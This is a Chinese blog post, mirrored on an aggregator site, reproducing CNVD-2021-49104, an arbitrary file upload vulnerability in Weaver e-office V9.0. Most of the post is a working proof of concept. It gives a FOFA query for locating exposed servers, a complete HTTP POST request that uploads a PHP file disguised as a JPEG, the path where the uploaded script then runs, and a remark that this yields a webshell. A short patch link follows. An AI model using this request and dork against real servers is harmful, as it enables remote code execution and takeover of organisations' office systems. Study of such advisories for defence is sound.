zoukankan      html  css  js  c++  java
  • 泛微OA 任意文件上传漏洞CNVD202149104

    漏洞编号:

    CNVD-2021-49104

    漏洞描述:

    泛微e-office是泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。

    危害等级:

    高危

    文件上传可直接get webshell

    FOFA:

    app="泛微-EOffice"

    影响版本:

    泛微e-office V9.0

    漏洞复现:

    构造请求上传文件即可

    POST http://ip:port/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
    Host: ip:port
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Connection: close
    Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
    Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
    Content-Length: 190
    Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
    
    --e64bdf16c554bbc109cecef6451c26a4
    Content-Disposition: form-data; name="Filedata"; filename="test.php"
    Content-Type: image/jpeg
    
    <?php phpinfo(111);?>
    --e64bdf16c554bbc109cecef6451c26a4--
    
    
    访问位置:
    http://ip:port/images/logo/logo-eoffice.php
    访问后缀名同filename后缀名
    

    修复建议:

    厂商已提供漏洞修补方案,建议用户下载使用:http://v10.e-office.cn/eoffice9update/safepack.zip

  • 相关阅读:
    高校教师职评
    高校教师曝职评内幕:混行政圈比科研圈更重要
    【50.88%】【Codeforces round 382B】Urbanization
    【64.22%】【codefoces round 382A】Ostap and Grasshopper
    【u253】售货厅
    【u250】manhattan
    【19.77%】【codeforces 570D】Tree Requests
    【t063】最聪明的机器人
    Java Web整合开发(38) -- Log4J
    公网 or 内网
  • 原文地址:https://www.cnblogs.com/bflw/p/15618444.html
Copyright © 2011-2022 走看看